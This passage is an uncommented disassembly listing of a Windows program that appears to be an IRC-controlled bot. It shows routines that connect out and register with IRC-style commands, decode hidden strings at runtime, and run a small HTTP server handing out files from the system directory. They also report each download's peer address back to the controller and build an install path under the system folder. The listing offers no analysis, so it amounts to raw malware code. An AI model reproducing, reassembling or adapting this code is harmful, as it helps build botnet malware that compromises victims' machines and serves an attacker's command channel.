		push	dword ptr [edi]
		jmp	short loc_418CEC
; ---------------------------------------------------------------------------

loc_418D3C:				; CODE XREF: sub_418CAF+87j
		push	200h
		lea	eax, [ebp+var_230]
		push	ebx
		push	eax
		call	sub_408130
		movsx	eax, word ptr [esi+0Ah]
		add	esp, 0Ch
		push	eax
		mov	eax, [esi+0Ch]
		push	dword ptr [eax]
		lea	eax, [ebp+var_43C]
		push	eax
		call	sub_4081B0
		add	esp, 0Ch
		push	[ebp+arg_4]
		mov	[ebp+var_440], 2
		call	ds:dword_41E270	; htons
		mov	[ebp+var_43E], ax
		push	10h
		lea	eax, [ebp+var_440]
		push	eax
		push	dword ptr [edi]
		call	ds:dword_41E23C	; connect
		test	eax, eax
		jnz	short loc_418D38
		mov	eax, [ebp+var_44C]
		lea	edx, [eax+1]

loc_418DA1:				; CODE XREF: sub_418CAF+F7j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418DA1
		sub	eax, edx
		jz	short loc_418E17
		xor	eax, eax
		mov	[ebp+var_18], bl
		lea	edi, [ebp+var_17]
		stosd
		push	1FFh
		stosd
		lea	eax, [ebp+var_42F]
		push	ebx
		push	eax
		mov	[ebp+var_430], bl
		call	sub_408130
		mov	ebx, [ebp+var_44C]
		add	esp, 0Ch
		push	200h
		lea	esi, [ebp+var_430]
		call	sub_41A33D
		pop	ecx
		push	9
		lea	esi, [ebp+var_18]
		mov	ebx, offset aA	; ""
		call	sub_41A33D
		mov	edi, [ebp+var_450]
		pop	ecx
		lea	eax, [ebp+var_430]
		push	eax
		mov	eax, esi
		push	eax
		push	offset aSS_8	; "%s %s\r\n"
		call	sub_417F4C
		add	esp, 0Ch
		xor	ebx, ebx

loc_418E17:				; CODE XREF: sub_418CAF+FBj
		xor	eax, eax
		mov	[ebp+var_24], bl
		lea	edi, [ebp+var_23]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_30], bl
		lea	edi, [ebp+var_2F]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_C], bl
		lea	edi, [ebp+var_B]
		stosd
		stosw
		xor	eax, eax
		push	ebx
		mov	[ebp+var_448], bl
		lea	edi, [ebp+var_447]
		stosw
		push	3
		mov	[ebp+var_444], bl
		lea	edi, [ebp+var_443]
		pop	ecx
		lea	esi, [ebp+var_448]
		stosw
		call	sub_419AD1
		pop	ecx
		push	ebx
		push	3
		lea	esi, [ebp+var_444]
		call	sub_419A9F
		xor	eax, eax
		lea	edi, [ebp+var_C]
		stosd
		stosw
		stosb
		mov	eax, esi
		push	eax
		lea	eax, [ebp+var_448]
		push	eax
		push	offset aSS_9	; "%s-%s"
		lea	eax, [ebp+var_C]
		push	6
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_C]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_418E9E:				; CODE XREF: sub_418CAF+1F4j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418E9E
		sub	eax, esi
		mov	[ebp+eax+var_C], bl
		xor	eax, eax
		lea	edi, [ebp+var_448]
		stosw
		stosb
		xor	eax, eax
		lea	edi, [ebp+var_444]
		stosw
		push	9
		lea	esi, [ebp+var_24]
		mov	ebx, offset aPivk ; ""
		stosb
		call	sub_41A33D
		pop	ecx
		push	9
		lea	esi, [ebp+var_30]
		mov	ebx, offset aD	; ""
		call	sub_41A33D
		mov	edi, [ebp+var_450]
		pop	ecx
		lea	ebx, [edi+5]
		call	sub_41810B
		push	ebx
		lea	eax, [ebp+var_C]
		push	eax
		mov	eax, esi
		push	eax
		push	ebx
		lea	eax, [ebp+var_24]
		push	eax
		push	offset aSSSS00S	; "%s %s\r\n%s %s 0 0 :%s\r\n"
		call	sub_417F4C
		add	esp, 18h
		mov	al, 1

loc_418F0B:				; CODE XREF: sub_418CAF+45j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	8
sub_418CAF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418F1C	proc near		; CODE XREF: sub_418F81+3Ep

var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_10], eax
		xor	eax, eax
		mov	[ebp+var_C], 0
		lea	edi, [ebp+var_B]
		push	5
		lea	esi, [ebp+var_C]
		mov	ebx, offset aPivk ; ""
		stosd
		call	sub_41A33D
		mov	ebx, [ebp+var_10]
		pop	ecx
		add	ebx, 5
		call	sub_41810B
		push	ebx
		mov	eax, esi
		push	eax
		push	offset aSS_7	; "%s %s\r\n"
		mov	edi, offset dword_428D1C
		call	sub_417F4C
		mov	ecx, [ebp+var_4]
		add	esp, 0Ch
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	4
sub_418F1C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_418F81	proc near		; DATA XREF: sub_41C7BA+379o
		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	esi
		push	edi
		call	sub_419A20
		mov	edi, dword_4288F8
		mov	esi, dword_4288FC

loc_418F9A:				; CODE XREF: sub_418F81+5Aj
		call	sub_419A20
		cmp	dword_4288FC, esi
		jl	short loc_418FC4
		jg	short loc_418FB1
		cmp	dword_4288F8, edi
		jbe	short loc_418FC4

loc_418FB1:				; CODE XREF: sub_418F81+26j
		cmp	byte_428D20, 0
		jz	short loc_418FC4
		push	offset dword_428D1C
		call	sub_418F1C

loc_418FC4:				; CODE XREF: sub_418F81+24j
					; sub_418F81+2Ej ...
		mov	edi, dword_4288F8
		mov	esi, dword_4288FC
		push	0C350h
		call	ds:off_41E0F8
		jmp	short loc_418F9A
sub_418F81	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418FDD	proc near		; CODE XREF: sub_41976B+1Ep

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		push	offset word_4289F4
		push	dword_428B0C
		mov	[ebp+var_4], 10h
		call	ds:dword_41E234	; accept
		leave
		retn
sub_418FDD	endp


; =============== S U B	R O U T	I N E =======================================



sub_418FFF	proc near		; CODE XREF: sub_4191D2+1D2p

arg_0		= dword	ptr  4

		jmp	short loc_419004
; ---------------------------------------------------------------------------

loc_419001:				; CODE XREF: sub_418FFF+14j
		mov	byte ptr [eax],	5Ch

loc_419004:				; CODE XREF: sub_418FFFj
		push	2Fh
		push	[esp+4+arg_0]
		call	sub_403DE0
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_419001
		retn
sub_418FFF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419016	proc near		; CODE XREF: sub_4191D2+192p

var_C		= byte ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
var_2		= byte ptr -2
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		mov	eax, esi
		push	edi
		lea	ecx, [eax+1]

loc_419027:				; CODE XREF: sub_419016+16j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419027
		sub	eax, ecx
		inc	eax
		push	eax
		call	sub_402BD6
		mov	ebx, eax
		push	ebx
		call	sub_402FD3
		push	eax
		push	0
		push	ebx
		call	sub_408130
		push	25h
		push	esi
		call	sub_403DE0
		add	esp, 1Ch
		test	eax, eax
		jnz	short loc_4190A0

loc_419057:				; CODE XREF: sub_419016+114j
		mov	eax, esi
		mov	edx, esi

loc_41905B:				; CODE XREF: sub_419016+4Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41905B
		mov	edi, ebx
		sub	eax, edx
		dec	edi

loc_419067:				; CODE XREF: sub_419016+57j
		mov	cl, [edi+1]
		inc	edi
		test	cl, cl
		jnz	short loc_419067
		mov	ecx, eax
		shr	ecx, 2
		mov	esi, edx
		mov	edx, [ebp+arg_0]
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		xor	eax, eax
		mov	edi, edx
		stosd
		mov	eax, ebx
		sub	edx, ebx

loc_41908B:				; CODE XREF: sub_419016+7Dj
		mov	cl, [eax]
		mov	[edx+eax], cl
		inc	eax
		test	cl, cl
		jnz	short loc_41908B
		xor	esi, esi
		inc	esi
		jmp	loc_419131
; ---------------------------------------------------------------------------

loc_41909D:				; CODE XREF: sub_419016+10Ej
		mov	eax, [ebp+var_8]

loc_4190A0:				; CODE XREF: sub_419016+3Fj
		mov	byte ptr [eax],	0
		mov	ecx, esi

loc_4190A5:				; CODE XREF: sub_419016+94j
		mov	dl, [ecx]
		inc	ecx
		test	dl, dl
		jnz	short loc_4190A5
		sub	ecx, esi
		mov	edi, ebx
		mov	edx, ecx
		dec	edi

loc_4190B3:				; CODE XREF: sub_419016+A3j
		mov	cl, [edi+1]
		inc	edi
		test	cl, cl
		jnz	short loc_4190B3
		mov	ecx, edx
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		and	ecx, 3
		inc	eax
		push	2
		push	eax
		mov	[ebp+var_8], eax
		lea	eax, [ebp+var_4]
		push	eax
		rep movsb
		call	sub_403EA0
		lea	eax, [ebp+var_C]
		push	eax
		lea	eax, [ebp+var_4]
		push	offset asc_421664 ; "%x"
		push	eax
		mov	[ebp+var_2], 0
		call	sub_403B72
		add	esp, 18h
		test	eax, eax
		jz	short loc_41912F
		mov	eax, ebx
		lea	esi, [eax+1]

loc_4190FB:				; CODE XREF: sub_419016+EAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4190FB
		mov	cl, [ebp+var_C]
		sub	eax, esi
		mov	esi, [ebp+var_8]
		add	esi, 2
		push	25h
		push	esi
		mov	[eax+ebx], cl
		mov	byte ptr [eax+ebx+1], 0
		call	sub_403DE0
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[ebp+var_8], eax
		jnz	loc_41909D
		jmp	loc_419057
; ---------------------------------------------------------------------------

loc_41912F:				; CODE XREF: sub_419016+DEj
		xor	esi, esi

loc_419131:				; CODE XREF: sub_419016+82j
		push	ebx
		call	sub_403129
		pop	ecx
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		leave
		retn
sub_419016	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41913F	proc near		; CODE XREF: sub_4191D2+A1p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		mov	[eax], esi
		mov	eax, [ebp+arg_4]
		push	edi
		mov	[eax], esi
		mov	eax, [ebp+arg_8]
		push	offset asc_42164C ; "\r\n"
		push	esi
		mov	[ebx], esi
		mov	[eax], esi
		call	sub_403D40
		mov	edi, eax
		test	edi, edi
		pop	ecx
		pop	ecx
		jnz	short loc_41916B

loc_419167:				; CODE XREF: sub_41913F+52j
					; sub_41913F+69j ...
		xor	eax, eax
		jmp	short loc_4191CF
; ---------------------------------------------------------------------------

loc_41916B:				; CODE XREF: sub_41913F+26j
		push	offset asc_421650 ; " "
		push	esi
		mov	byte ptr [edi],	0
		call	sub_403FC4
		mov	ecx, [ebp+arg_0]
		push	offset asc_421654 ; " "
		push	0
		mov	[ecx], eax
		call	sub_403FC4
		add	esp, 10h
		test	eax, eax
		mov	[ebx], eax
		jz	short loc_419167
		push	offset asc_421658 ; " "
		push	0
		call	sub_403FC4
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	ecx, [ebp+arg_4]
		mov	[ecx], eax
		jz	short loc_419167
		mov	ecx, [ebp+arg_8]
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	0
		mov	[ecx], eax
		jz	short loc_4191CC
		push	offset asc_42165C ; "\r\n\r\n"
		push	eax
		call	sub_403D40
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_419167
		mov	byte ptr [eax+2], 0

loc_4191CC:				; CODE XREF: sub_41913F+76j
		xor	eax, eax
		inc	eax

loc_4191CF:				; CODE XREF: sub_41913F+2Aj
		pop	edi
		pop	ebp
		retn
sub_41913F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=0CA8h


sub_4191D2	proc near		; CODE XREF: sub_41976B+28p

var_D28		= dword	ptr -0D28h
var_D24		= dword	ptr -0D24h
var_D20		= dword	ptr -0D20h
var_D1C		= dword	ptr -0D1Ch
var_D18		= byte ptr -0D18h
var_D14		= byte ptr -0D14h
var_D13		= byte ptr -0D13h
var_D12		= byte ptr -0D12h
var_D11		= byte ptr -0D11h
var_D08		= byte ptr -0D08h
var_D07		= byte ptr -0D07h
var_908		= byte ptr -908h
var_907		= byte ptr -907h
var_508		= byte ptr -508h
var_507		= byte ptr -507h
var_108		= byte ptr -108h
var_107		= byte ptr -107h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-0CA8h]
		sub	esp, 0D28h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+0CA8h+var_4], eax
		push	ebx
		push	esi
		mov	esi, 3FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+0CA8h+var_907]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_908], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+0CA8h+var_507]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_508], bl
		call	sub_408130
		push	103h
		lea	eax, [ebp+0CA8h+var_107]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_108], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+0CA8h+var_D07]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_D08], bl
		call	sub_408130
		add	esp, 30h
		push	ebx
		push	400h
		lea	eax, [ebp+0CA8h+var_D08]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	ds:dword_41E26C	; recv
		mov	[ebp+eax+0CA8h+var_D08], bl
		lea	eax, [ebp+0CA8h+var_D1C]
		push	eax
		lea	eax, [ebp+0CA8h+var_D20]
		push	eax
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		lea	ebx, [ebp+0CA8h+var_D24]
		lea	esi, [ebp+0CA8h+var_D08]
		call	sub_41913F
		add	esp, 0Ch
		test	eax, eax
		jz	loc_419754
		mov	esi, [ebp+0CA8h+var_D28]
		push	edi
		push	4
		mov	edi, offset aGet ; "GET"
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	loc_419360
		push	offset aQue?	; "Que?"
		mov	esi, 3FFh
		lea	eax, [ebp+0CA8h+var_908]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_908]
		add	esp, 0Ch
		lea	edx, [eax+1]

loc_4192BC:				; CODE XREF: sub_4191D2+EFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4192BC
		sub	eax, edx
		xor	ebx, ebx
		mov	[ebp+eax+0CA8h+var_908], bl
		lea	eax, [ebp+0CA8h+var_908]
		lea	ecx, [eax+1]

loc_4192D7:				; CODE XREF: sub_4191D2+10Aj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_4192D7
		sub	eax, ecx
		push	eax
		push	offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
		lea	eax, [ebp+0CA8h+var_508]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_508]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4192FF:				; CODE XREF: sub_4191D2+132j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_4192FF
		sub	eax, ecx
		mov	[ebp+eax+0CA8h+var_508], bl
		lea	eax, [ebp+0CA8h+var_508]
		lea	ecx, [eax+1]

loc_419318:				; CODE XREF: sub_4191D2+14Bj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_419318
		mov	esi, ds:dword_41E228
		push	ebx
		sub	eax, ecx
		push	eax
		lea	eax, [ebp+0CA8h+var_508]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		lea	eax, [ebp+0CA8h+var_908]
		lea	ecx, [eax+1]

loc_419341:				; CODE XREF: sub_4191D2+174j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_419341
		push	ebx
		sub	eax, ecx
		push	eax
		lea	eax, [ebp+0CA8h+var_908]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		jmp	loc_419747
; ---------------------------------------------------------------------------

loc_419360:				; CODE XREF: sub_4191D2+C1j
		mov	edi, [ebp+0CA8h+var_D24]
		push	edi
		call	sub_419016
		test	eax, eax
		pop	ecx
		jz	loc_419753
		mov	eax, edi
		lea	edx, [eax+1]

loc_419377:				; CODE XREF: sub_4191D2+1AAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_419377
		sub	eax, edx
		cmp	eax, 1
		jbe	loc_4194C9
		inc	edi
		push	2Fh
		push	edi
		call	sub_403DE0
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		pop	ecx
		pop	ecx
		jz	loc_419426
		mov	[esi], bl
		inc	esi
		push	esi
		call	sub_418FFF
		push	ebx
		push	esi
		call	sub_403DE0
		add	esp, 0Ch
		cmp	[esi], bl
		jz	short loc_4193EF
		cmp	byte ptr [eax-1], 5Ch
		jz	short loc_4193EF
		push	esi
		push	edi
		push	offset dword_428A08
		push	offset aSSS	; "%s\\%s\\%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 18h
		lea	esi, [eax+1]

loc_4193E6:				; CODE XREF: sub_4191D2+219j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4193E6
		jmp	short loc_419455
; ---------------------------------------------------------------------------

loc_4193EF:				; CODE XREF: sub_4191D2+1E3j
					; sub_4191D2+1E9j
		push	offset dword_428C18
		push	esi
		push	edi
		push	offset dword_428A08
		push	offset aSSSS	; "%s\\%s\\%s%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41941D:				; CODE XREF: sub_4191D2+250j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41941D
		jmp	short loc_419455
; ---------------------------------------------------------------------------

loc_419426:				; CODE XREF: sub_4191D2+1C8j
		push	edi
		push	offset dword_428A08
		push	offset aSS_4	; "%s\\%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 14h
		lea	esi, [eax+1]

loc_41944E:				; CODE XREF: sub_4191D2+281j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41944E

loc_419455:				; CODE XREF: sub_4191D2+21Bj
					; sub_4191D2+252j
		sub	eax, esi
		mov	[ebp+eax+0CA8h+var_108], bl
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		push	offset byte_428B10
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_4194CB
		mov	esi, 200h
		push	esi
		call	sub_403C6E
		push	esi
		mov	edi, eax
		push	ebx
		push	edi
		mov	[ebp+0CA8h+var_D20], edi
		call	sub_408130
		add	esp, 10h
		push	offset aQue?_1	; "Que?"
		push	edi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_4194AC:				; CODE XREF: sub_4191D2+2DFj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4194AC
		sub	eax, esi
		mov	[eax+edi], bl
		mov	eax, edi
		lea	esi, [eax+1]

loc_4194BD:				; CODE XREF: sub_4191D2+2F0j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4194BD
		jmp	loc_4195AE
; ---------------------------------------------------------------------------

loc_4194C9:				; CODE XREF: sub_4191D2+1B1j
		xor	ebx, ebx

loc_4194CB:				; CODE XREF: sub_4191D2+2A1j
		push	ebx
		push	ebx
		push	3
		push	ebx
		push	1
		push	80000000h
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		call	ds:off_41E06C
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		mov	[ebp+0CA8h+var_D24], esi
		jz	short loc_41955F
		push	ebx
		push	esi
		call	ds:off_41E070
		mov	edi, eax
		push	edi
		mov	[ebp+0CA8h+var_D1C], edi
		call	sub_403C6E
		push	edi
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_D20], eax
		call	sub_408130
		add	esp, 10h
		push	ebx
		push	ebx
		push	ebx
		push	esi
		mov	esi, ds:off_41E074
		call	esi ; sub_44215E
		push	ebx
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		push	edi
		mov	edi, ds:off_41E078
		jmp	short loc_419551
; ---------------------------------------------------------------------------

loc_419529:				; CODE XREF: sub_4191D2+389j
		cmp	[ebp+0CA8h+var_D28], ebx
		jnz	loc_4195B3
		push	[ebp+0CA8h+var_D1C]
		push	ebx
		push	[ebp+0CA8h+var_D20]
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+0CA8h+var_D24]
		call	esi ; sub_44215E
		push	ebx
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		push	[ebp+0CA8h+var_D1C]

loc_419551:				; CODE XREF: sub_4191D2+355j
		push	[ebp+0CA8h+var_D20]
		push	[ebp+0CA8h+var_D24]
		call	edi ; sub_453849
		test	eax, eax
		jnz	short loc_419529
		jmp	short loc_4195B3
; ---------------------------------------------------------------------------

loc_41955F:				; CODE XREF: sub_4191D2+31Aj
		mov	esi, 200h
		push	esi
		call	sub_403C6E
		push	esi
		mov	edi, eax
		push	ebx
		push	edi
		mov	[ebp+0CA8h+var_D20], edi
		call	sub_408130
		add	esp, 10h
		push	offset aQue?_0	; "Que?"
		push	edi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_419596:				; CODE XREF: sub_4191D2+3C9j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_419596
		sub	eax, esi
		mov	[eax+edi], bl
		mov	eax, edi
		lea	esi, [eax+1]

loc_4195A7:				; CODE XREF: sub_4191D2+3DAj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4195A7

loc_4195AE:				; CODE XREF: sub_4191D2+2F2j
		sub	eax, esi
		mov	[ebp+0CA8h+var_D1C], eax

loc_4195B3:				; CODE XREF: sub_4191D2+35Aj
					; sub_4191D2+38Bj
		push	400h
		lea	eax, [ebp+0CA8h+var_508]
		push	ebx
		push	eax
		call	sub_408130
		push	[ebp+0CA8h+var_D1C]
		lea	eax, [ebp+0CA8h+var_508]
		push	offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
		push	3FFh
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_508]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_4195EA:				; CODE XREF: sub_4191D2+41Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4195EA
		sub	eax, esi
		mov	[ebp+eax+0CA8h+var_508], bl
		lea	eax, [ebp+0CA8h+var_508]
		lea	esi, [eax+1]

loc_419603:				; CODE XREF: sub_4191D2+436j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_419603
		sub	eax, esi
		mov	esi, ds:dword_41E228
		push	ebx
		push	eax
		lea	eax, [ebp+0CA8h+var_508]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		test	eax, eax
		jz	loc_41973E
		push	ebx
		push	[ebp+0CA8h+var_D1C]
		push	[ebp+0CA8h+var_D20]
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		test	eax, eax
		jz	loc_41973E
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		push	offset byte_428B10
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	loc_41973E
		push	100h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aSiU ; "‘ғ"
		call	sub_41A33D
		xor	eax, eax
		lea	edi, [ebp+0CA8h+var_D18]
		stosd
		stosd
		stosd
		add	esp, 0Ch
		stosd
		lea	eax, [ebp+0CA8h+var_D24]
		push	eax
		lea	eax, [ebp+0CA8h+var_D18]
		push	eax
		push	[ebp+0CA8h+arg_0]
		mov	[ebp+0CA8h+var_D24], 10h
		call	ds:dword_41E278	; getpeername
		movzx	eax, [ebp+0CA8h+var_D11]
		movzx	ecx, [ebp+0CA8h+var_D12]
		shl	eax, 8
		add	eax, ecx
		movzx	ecx, [ebp+0CA8h+var_D13]
		shl	eax, 8
		add	eax, ecx
		movzx	ecx, [ebp+0CA8h+var_D14]
		shl	eax, 8
		add	eax, ecx
		push	2
		mov	[ebp+0CA8h+var_D1C], eax
		push	4
		lea	eax, [ebp+0CA8h+var_D1C]
		push	eax
		call	ds:dword_41E224	; gethostbyaddr
		test	eax, eax
		push	dword_437378
		jnz	short loc_419706
		movzx	eax, [ebp+0CA8h+var_D11]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D12]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D13]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D14]
		push	eax
		push	offset aHttpTransferD_ ; "HTTP:	Transfer: %d.%d.%d.%d (N/A). %d	T"...
		push	esi
		push	0
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 24h
		jmp	short loc_419731
; ---------------------------------------------------------------------------

loc_419706:				; CODE XREF: sub_4191D2+507j
		push	dword ptr [eax]
		movzx	eax, [ebp+0CA8h+var_D11]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D12]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D13]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D14]
		push	eax
		push	offset aHttpTransfer_0 ; "HTTP:	Transfer: %d.%d.%d.%d (%s). %d To"...
		push	esi
		push	0
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 28h

loc_419731:				; CODE XREF: sub_4191D2+532j
		inc	dword_437378
		push	esi
		call	sub_403129
		pop	ecx

loc_41973E:				; CODE XREF: sub_4191D2+453j
					; sub_4191D2+46Aj ...
		push	[ebp+0CA8h+var_D20]
		call	sub_403B91
		pop	ecx

loc_419747:				; CODE XREF: sub_4191D2+189j
		push	[ebp+0CA8h+arg_0]
		call	ds:dword_41E280	; closesocket

loc_419753:				; CODE XREF: sub_4191D2+19Aj
		pop	edi

loc_419754:				; CODE XREF: sub_4191D2+ABj
		mov	ecx, [ebp+0CA8h+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 0CA8h
		leave
		retn
sub_4191D2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41976B	proc near		; DATA XREF: sub_4198C0+27o

arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

; FUNCTION CHUNK AT 0043EE75 SIZE 0000000B BYTES

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_4], 401h
		jz	short loc_41977E
		pop	ebp
		jmp	ds:off_41E1FC
; ---------------------------------------------------------------------------

loc_41977E:				; CODE XREF: sub_41976B+Aj
		mov	eax, [ebp+arg_C]
		dec	eax
		jz	short loc_419790
		sub	eax, 7
		jnz	short loc_419799
		call	sub_418FDD
		jmp	short loc_419799
; ---------------------------------------------------------------------------

loc_419790:				; CODE XREF: sub_41976B+17j
		push	[ebp+arg_8]
		call	sub_4191D2
		pop	ecx

loc_419799:				; CODE XREF: sub_41976B+1Cj
					; sub_41976B+23j
		xor	eax, eax
		pop	ebp
		retn	10h
sub_41976B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_41979F	proc near		; CODE XREF: sub_4198C0+9Bp

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, 104h
		push	edi
		xor	ebp, ebp
		push	ebp
		mov	ebx, offset dword_428A08
		push	ebx
		call	sub_408130
		push	edi
		push	ebp
		mov	esi, offset dword_428C18
		push	esi
		call	sub_408130
		push	edi
		push	ebp
		mov	ebp, offset byte_428B10
		push	ebp
		call	sub_408130
		add	esp, 24h
		push	edi
		push	ebx
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		push	edi
		mov	ebx, offset aDfstcvDsd ; "τ"
		call	sub_41A33D
		push	esi
		push	offset dword_428A08
		push	offset aSS_1	; "%s\\%s"
		push	103h
		push	ebp
		call	sub_40307C
		mov	eax, ebp
		add	esp, 18h
		lea	ecx, [eax+1]

loc_419805:				; CODE XREF: sub_41979F+6Bj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419805
		push	0
		push	1
		sub	eax, ecx
		push	2
		mov	byte_428B10[eax], dl
